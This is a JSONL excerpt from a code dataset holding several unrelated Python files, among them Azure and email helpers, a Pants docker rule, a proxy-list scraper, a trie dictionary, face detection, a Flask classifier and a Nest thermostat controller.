content_settings=ContentSettings('text/json'),\n timeout=5\n )\n\n except KeyError as e:\n pass # This is already handled in taglistener.py\n\n\n def create_directory(self, directory_name):\n dir_already_exists = False\n for item in self.file_service.list_directories_and_files(self.share_name):\n if item.name == directory_name:\n dir_already_exists = True\n break\n if not dir_already_exists:\n self.file_service.create_directory(self.share_name, directory_name)\n\n return directory_name\n\n\n def get_items(self, directory_name=None):\n return self.file_service.list_directories_and_files(self.share_name, directory_name=directory_name)\n\n\n def print_items(self, directory_name=None):\n for item in self.get_items(directory_name=directory_name):\n print(item.name)\n\n\n def count_items(self, directory_name=None):\n return it_count(self.get_items(directory_name=directory_name))\n","sub_path":"tweet-miner/azurefileservice.py","file_name":"azurefileservice.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"266751190","text":"'''\r\nCreated on Jan 25, 2016\r\n\r\n@author: KIT1HC\r\n'''\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom src.LoggerUtil import Logger\r\n\r\nclass EmailUtil(object):\r\n\r\n def __init__(self, server, port, usrname=\"\", pwd=\"\"):\r\n self.logger = Logger()\r\n self.logger.name = __name__\r\n \r\n self.server = server\r\n self.port = port\r\n self.usrname = usrname\r\n self.pwd = pwd\r\n \r\n def sendEmail(self, fromAdd, toAdd, subject, body, attachment=\"\"):\r\n server = smtplib.SMTP(self.server, self.port)\r\n msg = self._createMsg(fromAdd, toAdd, subject, body);\r\n \r\n if attachment != \"\":\r\n f = file(attachment)\r\n att = MIMEText(f.read())\r\n att.add_header(\"Content-Disposition\", \"attachment\", filename=attachment)\r\n msg.attach(att)\r\n \r\n server.sendmail(fromAdd, toAdd, msg.__str__())\r\n self.logger.info(\"Email Sent\")\r\n\r\n \r\n def _createMsg(self, fromAdd, toAdd, subject, body):\r\n msg = MIMEMultipart()\r\n\r\n msg['From'] = fromAdd\r\n msg['To'] = toAdd\r\n msg['Subject'] = subject\r\n msg.attach(MIMEText(body, 'html'))\r\n return msg\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n host = \"rb-smtp-int.bosch.com\"\r\n port = 25\r\n username = \"thach.kieubuu@vn.bosch.com\"\r\n toAdd = \"thach.kieubuu@vn.bosch.com;\"\r\n pwd = \"\"\r\n body = \"test\\r\\n\"\r\n subject = \"python framework\"\r\n attachment = \"d:/log.txt\"\r\n \r\n email = EmailUtil(host, port)\r\n email.sendEmail(username, toAdd, subject, body, attachment)\r\n# email.sendEmail(username, toAdd, subject, body)","sub_path":"com.etas.systemtest.utils/src/EmailUtil.py","file_name":"EmailUtil.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"253702157","text":"# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom typing import Mapping\n\nfrom pants.backend.docker.util_rules.docker_build_args import DockerBuildArgs\nfrom pants.engine.fs import Digest\nfrom pants.engine.process import (\n BinaryNotFoundError,\n BinaryPath,\n BinaryPathRequest,\n BinaryPaths,\n BinaryPathTest,\n Process,\n ProcessCacheScope,\n SearchPath,\n)\nfrom pants.engine.rules import Get, collect_rules, rule\nfrom pants.util.logging import LogLevel\nfrom pants.util.strutil import pluralize\n\n\nclass DockerBinary(BinaryPath):\n \"\"\"The `docker` binary.\"\"\"\n\n DEFAULT_SEARCH_PATH = SearchPath((\"/usr/bin\", \"/bin\", \"/usr/local/bin\"))\n\n def build_image(\n self,\n tags: tuple[str, ...],\n digest: Digest,\n dockerfile: str | None = None,\n build_args: DockerBuildArgs | None = None,\n env: Mapping[str, str] | None = None,\n ) -> Process:\n args = [self.path, \"build\"]\n\n for tag in tags:\n args.extend([\"-t\", tag])\n\n if build_args:\n for build_arg in build_args:\n args.extend([\"--build-arg\", build_arg])\n\n if dockerfile:\n args.extend([\"-f\", dockerfile])\n\n # Add build context root.\n args.append(\".\")\n\n return Process(\n argv=tuple(args),\n description=(\n f\"Building docker image {tags[0]}\"\n + (f\" +{pluralize(len(tags)-1, 'additional tag')}.\" if len(tags) > 1 else \".\")\n ),\n env=env,\n input_digest=digest,\n cache_scope=ProcessCacheScope.PER_SESSION,\n )\n\n def push_image(self, tags: tuple[str, ...]) -> Process | None:\n if not tags:\n return None\n\n return Process(\n argv=(self.path, \"push\", *tags),\n cache_scope=ProcessCacheScope.PER_SESSION,\n description=f\"Pushing docker image {tags[0]}\",\n )\n\n\n@dataclass(frozen=True)\nclass DockerBinaryRequest:\n search_path: SearchPath = DockerBinary.DEFAULT_SEARCH_PATH\n\n\n@rule(desc=\"Finding the `docker` binary\", level=LogLevel.DEBUG)\nasync def find_docker(docker_request: DockerBinaryRequest) -> DockerBinary:\n request = BinaryPathRequest(\n binary_name=\"docker\",\n search_path=docker_request.search_path,\n test=BinaryPathTest(args=[\"-v\"]),\n )\n paths = await Get(BinaryPaths, BinaryPathRequest, request)\n first_path = paths.first_path\n if not first_path:\n raise BinaryNotFoundError.from_request(request, rationale=\"interact with the docker daemon\")\n return DockerBinary(first_path.path, first_path.fingerprint)\n\n\n@rule\nasync def get_docker() -> DockerBinary:\n return await Get(DockerBinary, DockerBinaryRequest())\n\n\ndef rules():\n return collect_rules()\n","sub_path":"src/python/pants/backend/docker/util_rules/docker_binary.py","file_name":"docker_binary.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"16784461","text":"#coding:utf-8\nimport urllib.request\nimport re\nimport time\n#the time now\ntime=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n\nurl_id=1204\nwhile url_id<=(url_id+50):\n #visit the page\n url='http://www.youdaili.cn/Daili/http/%d.html'%url_id\n req=urllib.request.Request(url)\n response=urllib.request.urlopen(url)\n html=response.read().decode('utf-8')\n #find the time on the page\n reg=re.compile(r'\\d{4}-\\d{2}-\\d{2}')\n result=reg.findall(html)\n result=result[0]\n #is the page released today?\n if result==time:\n print('开始获取,开始下载')\n reg2=re.compile(r'\\d*\\.\\d*\\.\\d*\\.\\d*')\n result2=reg2.findall(html)\n print('下载完成')\n #print (result2)\n break\n\n else:\n url_id+=5\n #print(url_id)\n\nelse:\n print('获取失败...')\n\n","sub_path":"模拟点击安居客房源单页/iplist.py","file_name":"iplist.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"574206016","text":"from typing import List\n\n\nclass TrieNode:\n\n def __init__(self, val):\n self.val = val\n self.is_word = False\n self.children = {}\n\n def __repr__(self):\n return str({\n 'val:': self.val,\n 'children:': sorted(self.children.keys()),\n 'is_word:': self.is_word,\n })\n\n def has(self, val):\n return val in self.children\n\n def get(self, val):\n return self.children[val]\n\n def put(self, val):\n node = TrieNode(val)\n self.children[val] = node\n return node\n\n def put_node(self, node):\n if self.children.get(node.val) == node:\n return\n\n val = node.val\n self.children[val] = node\n\n\n# sc:\n# When key length is low: (A * N)\n# When key length is high: (A * L * K)\n# A: alphabet size\n# N: number of nodes (links)\n# K: average key (word) length\nclass Trie:\n\n def __init__(self):\n self.root = TrieNode(None)\n self.sentinel = '#'\n\n # tc: O(2^W)\n def add(self, word, node=None):\n if word:\n if node is None:\n node = self.root\n else:\n if node:\n node.is_word = True\n return\n\n char = word[0]\n\n if not node.has(char):\n node.put(char)\n if not node.has(self.sentinel):\n node.put(self.sentinel)\n\n self.add(word[1:], node.get(char))\n self.add(word[1:], node.get(self.sentinel))\n\n # tc: O(N)\n def contains(self, word, node=None):\n if node is None:\n node = self.root\n\n for i, letter in enumerate(word):\n if letter == '.':\n if node.has(self.sentinel):\n node = node.get(self.sentinel)\n else:\n return False\n elif node.has(letter):\n node = node.get(letter)\n else:\n return False\n\n return node.is_word\n\n\nclass WordDictionary:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.trie = Trie()\n\n # tc: O(N)\n def addWord(self, word: str) -> None:\n \"\"\"\n Adds a word into the data structure.\n \"\"\"\n self.trie.add(word)\n\n # tc: O(26^W)\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\n \"\"\"\n return self.trie.contains(word)\n\n\n# Your WordDictionary object will be instantiated and called as such:\n# obj = WordDictionary()\n# obj.addWord(word)\n# param_2 = obj.search(word)\n\nclass Solution:\n\n serialize = {\n None: 'null',\n True: 'true',\n False: 'false'\n }\n\n def run(self, actions, inputs):\n ans = [None]\n wd = WordDictionary()\n\n for j, action in enumerate(actions[1:], 1):\n if action == 'addWord':\n word = inputs[j][0]\n wd.addWord(word)\n ans.append(None)\n elif action == 'search':\n word = inputs[j][0]\n res = wd.search(word)\n ans.append(res)\n\n ans = [ serialize[entry] for entry in ans ]\n ans = '[' + ','.join(ans) + ']'\n","sub_path":"Leetcode/add_and_search_word/solution_eager.py","file_name":"solution_eager.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"357337212","text":"import cv2\nimport sys\nimport os\nimport numpy as np\n\n'''\nimg = cv2.imread(os.path.join(os.path.dirname(os.path.realpath(__file__)),'cat.bmp'))\n\nif img is None:\n print('Image load failed')\n sys.exit()\n\n#img = cv2.bitwise_not(img)\n\n\ncv2.namedWindow('image')\ncv2.imshow('image', img)\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n'''\nxml = 'haarcascade_frontalface_default.xml'\nface_cascade = cv2.CascadeClassifier(os.path.join(os.path.dirname(os.path.realpath(__file__)),xml))\nrgbNum = [(255, 0, 0),(0, 255, 0),(0, 0, 255),(255, 255, 0),(255, 0, 255),(0, 255, 255)]\n\ncapture = cv2.VideoCapture(0)\ncapture.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncapture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\nwhile True:\n ret, frame = capture.read()\n frame = cv2.flip(frame, 1)\n\n g = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(g, 1.05, 5)\n\n if len(faces):\n for i, (x,y,w,h) in enumerate(faces):\n cv2.rectangle(frame, (x,y), (x+w, y+h), rgbNum[i], 2)\n\n cv2.imshow(\"VideoFrame\", frame)\n k = cv2.waitKey(30) & 0xff\n if k == 27: # Esc 키를 누르면 종료\n break\n\ncapture.release()\ncv2.destroyAllWindows()","sub_path":"python/opencv_haarcascade_frontalface_detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"437177733","text":"from collections import Counter\nfrom itertools import islice, tee\nimport logging\nimport re\nimport sys\n\nfrom flask import Flask, jsonify, request\nfrom sklearn.externals import joblib\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n\nVERSION = 0.1\napp = Flask(__name__)\n\n\n@app.route('/v1/documents', methods=['POST'])\ndef create_tasks():\n response = {}\n text = request.json['text']\n classes = predict_review(clf_, text)\n response['labels'] = classes\n response['version'] = VERSION\n response['text_input'] = text\n \n log_out = response.copy()\n log_out.update(ip=request.remote_addr)\n logger.info(log_out)\n return jsonify(**response)\n\ndef tokenize(sentence):\n words = re.findall(\"[a-zA-Z]+\", sentence)\n bigram = []\n\n for gram in generate_ngrams(words, 2):\n bigram.append('{0} {1}'.format(gram[0], gram[1]))\n\n words.extend(bigram)\n return words\n\ndef generate_ngrams(lst, n):\n ilst = lst\n while True:\n a, b = tee(ilst)\n l = tuple(islice(a, n))\n if len(l) == n:\n yield l\n next(b)\n ilst = b\n else:\n break\n\ndef predict_review(clf_, review):\n d = ['Satisfaction', 'Content', 'Stability', 'Security',\n 'Privacy', 'Pricing', 'Usefulness']\n x = tfidf_transformer.transform(dict_vectorizer.transform(Counter(tokenize(review))))\n return sorted([(d[i], p) for i, p in enumerate(clf_.predict_proba(x)[0]) \\\n if p > 0.2], key=lambda x: -x[1])\n\nif __name__ == \"__main__\":\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.INFO)\n logger.addHandler(handler)\n \n clf_ = joblib.load('review_classification.pkl')\n dict_vectorizer = joblib.load('dict_vectorizer.pkl')\n tfidf_transformer = joblib.load('tfidf_transformer.pkl')\n app.run(debug=True, host='0.0.0.0')\n \n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"592517034","text":"from framework.rom import meta\nfrom framework.rom import rom_object\nfrom framework.rom import rom_property\nfrom framework.rom import rom_relation\nfrom framework.rom import base_types\nfrom framework.utils import log\nimport copy\nimport sqlalchemy\nfrom sqlalchemy import exc\n\n\nclass QueryState(base_types.ROMEnum):\n STOPPED = 0, 'Stopped'\n RUNNING = 1, 'Running'\n PAUSED = 2, 'Paused'\n\n\n@meta.rom()\nclass ResultQuery(rom_object.ROMObject):\n result_data = rom_relation.Relation(name=base_types.PARENT_CHILD_RELATION, src_cls_name='ResultQuery',\n target_cls_name='Result')\n\n State = rom_property.EnumProperty(QueryState, default=QueryState.STOPPED, category='state', display='State',\n serializable=False, description='The state of a statistics query')\n\n Interval = rom_property.U32Property(default=1000, category='config', display='Update interval',\n validator=(rom_property.NumRangeValidator(0, 60000),))\n\n # Advanced query provides a complete select statement\n Sql = rom_property.StringProperty(default='', category='config', display='Query sql statement', serializable=False,\n notify_mode='manual', description='The advanced query sql statement')\n\n # The columns to be queried. Empty means all columns defined in the result data class of result view\n Columns = rom_property.StringProperty(default='', category='config', display='Column names', aggregate=True,\n description='The column names to be queried')\n\n TargetPorts = rom_property.HandleProperty(default='', category='config', display='Target Ports', aggregate=True,\n description='The ports to be queried', private=True, serializable=False)\n\n def __init__(self):\n super().__init__()\n self._handler = None\n\n def _finalize(self):\n if self._handler:\n self._handler.destroy()\n\n def validate(self):\n return True, ''\n\n def on_prop_changed(self, prop_obj, old_value=None):\n if prop_obj.name == 'State':\n self.get_parent().update_cmd_status()\n elif prop_obj.name == 'TargetPorts':\n self._handler.reset_target_ports()\n self.restart()\n elif prop_obj.name == 'Interval':\n self.restart()\n\n @property\n def handler(self):\n if not self._handler:\n self._prepare()\n return self._handler\n\n @handler.setter\n def handler(self, value):\n if value != self._handler:\n self._handler.destroy()\n self._handler = value\n\n @property\n def backing_cls(self):\n return self.get_parent().backing_cls\n\n def _prepare(self):\n from . import handler\n self._handler = handler.create_handler(self)\n\n def start(self, enable_subscribe=True):\n if self.State != QueryState.RUNNING:\n self.handler.start(enable_subscribe=enable_subscribe)\n self.State = QueryState.RUNNING\n\n def stop(self):\n if self.State != QueryState.STOPPED:\n self.handler.stop()\n self.State = QueryState.STOPPED\n\n def pause(self):\n if self.State == QueryState.RUNNING:\n self.handler.pause()\n self.State = QueryState.PAUSED\n\n def resume(self):\n if self.State == QueryState.PAUSED:\n self.handler.resume()\n self.State = QueryState.RUNNING\n\n def restart(self, force=False):\n if self.State != QueryState.STOPPED or force:\n old_state = self.State\n self.stop()\n self.start(enable_subscribe=True if old_state == QueryState.RUNNING else False)\n\n def refresh(self):\n old_state = self.State\n self.start()\n if old_state != QueryState.STOPPED:\n self.handler.refresh()\n\n def clear_result(self):\n self.handler.clear_result()\n\n def remove_result(self):\n self.handler.remove_result()\n\n def get_target_ports(self):\n return self.TargetPorts\n\n def get_query_columns(self):\n result_cls = self.backing_cls\n if not self.Columns:\n return copy.copy(result_cls.get_columns())\n else:\n columns = copy.copy(result_cls.primary_keys())\n columns.append(result_cls.get_result_source_prop())\n temp = []\n for column_name in self.Columns:\n if not column_name:\n log.Logger.CL.warn('Empty column name in {}.Columns'.format(result_cls.cls_name()))\n continue\n\n values = column_name.split('.')\n if len(values) > 1 and values[0] != result_cls.cls_name():\n log.Logger.CL.warn('Invalid column name: {}'.format(column_name))\n continue\n\n prop = result_cls.get_prop_obj(values[1])\n if prop and prop not in columns:\n temp.append(prop)\n else:\n log.Logger.CL.warn('Cannot find column name: {}'.format(column_name))\n\n columns.extend(temp)\n return columns\n\n @classmethod\n def get_query_columns_by_names(cls, columns, result_cls):\n if columns:\n ret = copy.copy(result_cls.primary_keys())\n ret.append(result_cls.get_result_source_prop())\n temp = []\n columns_copy = copy.copy(columns)\n for column in columns_copy:\n if not column:\n columns.remove(column)\n continue\n\n values = column.split('.')\n if len(values) > 1 and values[0] != result_cls.cls_name():\n continue\n\n prop = result_cls.get_prop_obj(values[1])\n if prop and prop not in ret:\n temp.append(prop)\n columns.remove(column)\n ret.extend(temp)\n else:\n ret = copy.copy(result_cls.get_columns())\n return ret\n\n @classmethod\n def do_local_query(cls, handler):\n \"\"\"\n Query local memory database\n :param handler:\n :return: result objects needs to update to PL\n \"\"\"\n query = handler.query\n if query.State != QueryState.RUNNING:\n return\n\n result_cls = handler.backing_cls\n objects = []\n sql = sqlalchemy.text(result_cls.prepare_local_query(query))\n try:\n from .import db_api\n rows = db_api.ResultDatabase.orm_conn.execute(sql)\n for row in rows:\n obj = handler.upsert(row)\n if obj:\n objects.append(obj)\n except exc.SQLAlchemyError as err:\n log.Logger.CL.error('Failed to execute SQL {0} due to error:{1}'.format(sql, str(err)))\n\n return objects\n","sub_path":"CL/framework/result/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":6909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"614818775","text":"import random as rand\r\nimport sys\r\nfrom copy import deepcopy\r\nimport time\r\nimport numpy as np\r\nimport itertools\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\n\r\nfileName = \"\"\r\nmethod = 0\r\nN = 0\r\nmax_weight =0\r\nval= []\r\nwt =[]\r\ntimes = []\r\ndef main(arg):\r\n global N, max_weight, times\r\n if(arg[1]== '1'):\r\n \r\n print(\"Fuerza bruta\")\r\n matrix, origin = processArg(arg)\r\n for j in range(0, num(N)): # se toma el tiempo\r\n if origin == 2:\r\n print(\"Resultado:\")\r\n start_time = datetime.datetime.now()\r\n itemsSlected,weigth,optimalValue =knapsack_brute_force(matrix,max_weight)\r\n print(\"Beneficio máximo: \" + str(optimalValue))\r\n print(\"Incluidos: \"+str(itemsSlected)[1:len(str(itemsSlected))-1])\r\n print(\"Resultado:\")\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n else:\r\n print(\"Resultado:\")\r\n max_weight=matrix[0][0]\r\n numMatrix = setUpKnapSack(matrix)\r\n start_time = datetime.datetime.now()\r\n itemsSlected,weigth,optimalValue =knapsack_brute_force(numMatrix,max_weight)\r\n print(\"Beneficio máximo: \" + str(optimalValue))\r\n print(\"Incluidos: \"+str(itemsSlected)[1:len(str(itemsSlected))-1])\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n suma = 0\r\n for i in times:\r\n suma = suma + i\r\n suma = suma/len(times)\r\n print(\"Tiempor promedio de ejecución: \"+str(suma))\r\n '''plt.plot(times)\r\n plt.ylabel('Tiempo de ejecución')\r\n plt.xlabel('Iteración')\r\n plt.show()'''\r\n \r\n elif(arg[1] == '2'):\r\n print(\"Bottom up\")\r\n matrix, origin = processArg(arg)\r\n for j in range(0, num(N)): # se toma el tiempo\r\n if origin == 2:\r\n start_time = datetime.datetime.now()\r\n V = dynamicKnapSack(max_weight, matrix, len(matrix))\r\n print(\"Beneficio máximo: \"+ str(V[len(matrix)][max_weight]))\r\n \r\n itemSelected,wtf= findElements(V, max_weight,len(matrix), matrix)\r\n print(\"Incluidos: \"+str(itemSelected)[1:len(str(itemSelected))-1])\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n \r\n\r\n else:\r\n numMatrix = setUpKnapSack(matrix)\r\n max_weight=matrix[0][0]\r\n print(setFormat(numMatrix))\r\n start_time = datetime.datetime.now()\r\n V = dynamicKnapSack(max_weight, numMatrix, len(numMatrix))\r\n print(\"Beneficio máximo: \"+ str(V[len(numMatrix)][max_weight]))\r\n \r\n itemSelected,wtf= findElements(V, max_weight,len(numMatrix), numMatrix)\r\n print(\"Incluidos: \"+str(itemSelected)[1:len(str(itemSelected))-1])\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n suma = 0\r\n for i in times:\r\n suma = suma + i\r\n suma = suma/len(times)\r\n '''print(\"Tiempor promedio de ejecución: \"+str(suma))\r\n plt.plot(times)\r\n plt.ylabel('Tiempo de ejecución')\r\n plt.xlabel('Iteración')\r\n plt.show()'''\r\n elif (arg[1]== '3'):\r\n \r\n global val, wt\r\n print(\"top-down\") \r\n matrix, origin = processArg(arg)\r\n for j in range(0, num(N)): # se toma el tiempo\r\n if origin == 2:\r\n val, wt = setFormat(matrix)\r\n memo = generateMemo(len(val),max_weight+1)\r\n start_time = datetime.datetime.now()\r\n print(\"Beneficio máximo:\" + str(topDownKnapsack((len(val)-1), max_weight, memo))) \r\n printChoosen((choosenItems(memo)))\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n\r\n else:\r\n numMatrix = setUpKnapSack(matrix)\r\n max_weight = matrix[0][0]\r\n \r\n wt,val = setFormat(numMatrix)\r\n \r\n memo = generateMemo(len(val),max_weight+1)\r\n start_time = datetime.datetime.now()\r\n print(\"Beneficio máximo:\" + str(topDownKnapsack((len(val)-1), max_weight, memo))) \r\n printChoosen((choosenItems(memo)))\r\n end_time = datetime.datetime.now()\r\n time_diff = (end_time - start_time)\r\n execution_time = time_diff.total_seconds() * 1000\r\n times.append(execution_time)\r\n #print(\"Tiempo de ejecución: \"+str(execution_time))\r\n suma = 0\r\n for i in times:\r\n suma = suma + i\r\n suma = suma/len(times)\r\n print(\"Tiempor promedio de ejecución: \"+str(suma))\r\n '''plt.plot(times)\r\n plt.ylabel('Tiempo de ejecución')\r\n plt.xlabel('Iteración')\r\n plt.show()'''\r\n else:\r\n print(\"Metodo no implementado\")\r\n\r\ndef processArg(datos):\r\n global fileName, N\r\n if(len(datos) == 5):\r\n if(datos[2]==\"-a\"):\r\n fileName = datos[3]\r\n listOfData =readFile()\r\n N = num(datos[4])\r\n return formatMatrix(listOfData), 1\r\n else: \r\n\r\n print(\"Existe un problema con los parametros del sistema\")\r\n\r\n elif(len(datos) == 8 ):\r\n global max_weight\r\n if(datos[2]==\"-p\"):\r\n print(\"Procesando parametros\")\r\n max_weight= num(datos[3])\r\n elements = num(datos[4])\r\n weigth = datos[5].split('-')\r\n value = datos[6].split('-')\r\n value[0] = num(value[0])\r\n value[1] = num(value[1]) \r\n weigth[0] = num(weigth[0])\r\n weigth[1] = num(weigth[1])\r\n N = num(datos[7])\r\n return build_items(elements, weigth, value),2\r\n\r\n\r\n else:\r\n print(\"Existe un problema con los parametros del sistema\") \r\n\r\ndef readFile():\r\n lines = open(fileName, 'r').readlines()\r\n lines = list(map(removeEndLine, lines))\r\n listOfLists = []\r\n for line in lines:\r\n splittedLine = line.split(\",\")\r\n listOfLists.append(splittedLine)\r\n return listOfLists\r\n\r\ndef removeEndLine(line):\r\n if(line.endswith(\"\\n\")):\r\n return line.replace(\"\\n\", \"\")\r\n return line\r\n\r\ndef num(s):\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return float(s)\r\n\r\ndef formatMatrix(matrix):\r\n for row in range(len(matrix)):\r\n for column in range(len(matrix[row])):\r\n matrix[row][column] = num(matrix[row][column])\r\n \r\n return matrix\r\n\r\ndef setUpKnapSack(matrix):\r\n global max_weight\r\n currentMatrix = matrix[1:]\r\n newMatrix=[]\r\n n = len(currentMatrix)\r\n currentId = 1\r\n for i in currentMatrix:\r\n element = [currentId] + i\r\n currentId +=1\r\n newMatrix = newMatrix + [element]\r\n return newMatrix \r\n \r\n\r\n\r\ndef build_items(n, w, v):\r\n res= []\r\n rand.seed(time.time())\r\n for i in range(n):\r\n res.append((i, rand.randint(w[0], w[1]), rand.randint(v[0], v[1])))\r\n\r\n print(max_weight)\r\n\r\n return res\r\n\r\ndef powerset(items):\r\n res = [[]]\r\n for item in items:\r\n newset = [r+[item] for r in res]\r\n res.extend(newset)\r\n \r\n return res\r\n\r\n\r\ndef knapsack_brute_force(items, max_weight):\r\n knapsack = []\r\n best_weight = 0\r\n best_value = 0\r\n ids =[]\r\n for item_set in powerset(items):\r\n set_weight = sum([e[1] for e in item_set])\r\n set_value = sum([e[2] for e in item_set])\r\n if set_value > best_value and set_weight <= max_weight:\r\n best_value = set_value\r\n best_weight = set_weight\r\n knapsack = item_set\r\n for i in knapsack:\r\n ids = [i[0]] +ids\r\n return ids, best_weight, best_value\r\n\r\ndef dynamicKnapSack(W, items, n):\r\n V = []\r\n\r\n for i in range(n + 1):\r\n V.append([0] * (W + 1))\r\n\r\n for i in range(1, n + 1): \r\n for w in range(W + 1): \r\n if (items[i - 1][1] > w):\r\n V[i][w] = V[i - 1][w]\r\n elif (items[i - 1][2] + V[i - 1][w - items[i - 1][1]] > V[i - 1][w]):\r\n V[i][w] = items[i - 1][2] + V[i - 1][w - items[i - 1][1]]\r\n else: \r\n V[i][w] = V[i - 1][w]\r\n return V\r\n\r\n\r\ndef findElements(V,W,n,items):\r\n k = W\r\n peso= 0\r\n elements = []\r\n for i in range(n, 0, -1):\r\n if (V[i][k] != V[i - 1][k]):\r\n elements.append(i)\r\n i -= 1\r\n peso = peso+items[i][1]\r\n k -= items[i][1]\r\n else:\r\n i -= 1\r\n \r\n return [elements,peso]\r\n\r\n\r\n#Top Down\r\ndef topDownKnapsack(item, capacity, memo):\r\n if(capacity < 0):\r\n return -(1<<60)\r\n elif capacity == 0 or item == 0:\r\n return 0\r\n elif memo[item][capacity]:\r\n return memo[item][capacity]\r\n else:\r\n memo[item][capacity] = max(val[item] + topDownKnapsack(item-1, capacity - wt[item],memo), topDownKnapsack(item-1,capacity,memo))\r\n return memo[item][capacity]\r\n\r\n\r\ndef SET(n,i):\r\n return n | (1<= self.high_temp + self.activate_margin:\n target = self.high_temp - self.stop_margin\n self.logger.info(\"Current temp {} above high threshold {}, setting target to {}\".format(curr_temp, self.high_temp, target))\n self.mynest.set_target_temp(target)\n is_running = True\n self.logger.debug(\"Sleeping for {} seconds\".format(self.refresh_rate))\n time.sleep(self.refresh_rate)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Use Enviro pHAT temperature and Nest to maintain temp range.')\n\n parser.add_argument(dest=\"low_temp\", help=\"Lowest acceptable temp (in Fahrenheit)\", type=int)\n parser.add_argument(dest=\"high_temp\", help=\"Highest acceptable temp (in Fahrenheit)\", type=int)\n\n parser.add_argument(\"--refresh-rate\", help=\"Rate for polling temp from Enviro pHAT (in Hz, default=60)\", type=int, default=60)\n parser.add_argument(\"--activate-margin\", help=\"How many outside of the target range before start heating/cooling? (default=1)\", type=int, default=1)\n parser.add_argument(\"--stop-margin\", help=\"How many insde of the target range before stop heating/cooling? (default=2)\", type=int, default=2)\n parser.add_argument(\"--dummy-nest\", help=\"Use this for testing in order to not get throttled by the Nest API\", type=bool, action='store_true')\n\n args = parser.parse_args()\n\n control = EnviroNestControl(\n args.low_temp,\n args.high_temp,\n args.activate_margin,\n args.stop_margin,\n args.refresh_rate,\n dummy_nest=False\n )\n\n control.run()","sub_path":"enviro_nest_control.py","file_name":"enviro_nest_control.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"84902457","text":"'''\nCreated on 21 set. 2017\n\n1. http://django-role-permissions.readthedocs.io/en/stable/\n2. pip install django-role-permissions\n3. python manage.py shell (Para despues poder asignar roles a usuarios)\n4. from rolepermissions.roles import assign_role\n5. Crear usuarios en django admin\n6. user = User.objects.get(username='[NombreDeUsuarioEnAdmin]') --> no me anduvo, corri esto antes y ahi si: from django.contrib.auth.models import User\n7. assign_role(user, '[role]') el rol con minuscula\n-> https://www.youtube.com/watch?v=f6Doj2LOIlo\n@author: Juan\n'''\nfrom rolepermissions.roles import AbstractUserRole\n\nclass user(AbstractUserRole):\n available_permissions = {\n 'access_informe_x': True,\n 'access_informe_y': True,\n 'access_reportes': True,\n } ","sub_path":"ReportingApp/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"32257669","text":"def req_sum(num):\n total_sum = 0\n if len(num) == 1:\n #print(\"if: \", num)\n total_sum += num[0]\n elif len(num) > 1:\n #print(\"elif: \", num)\n total_sum += req_sum(num[0:1]) + req_sum(num[1:])\n return total_sum\n\n\ndef loop_sum(num):\n total_sum = 0\n for n in num:\n total_sum += 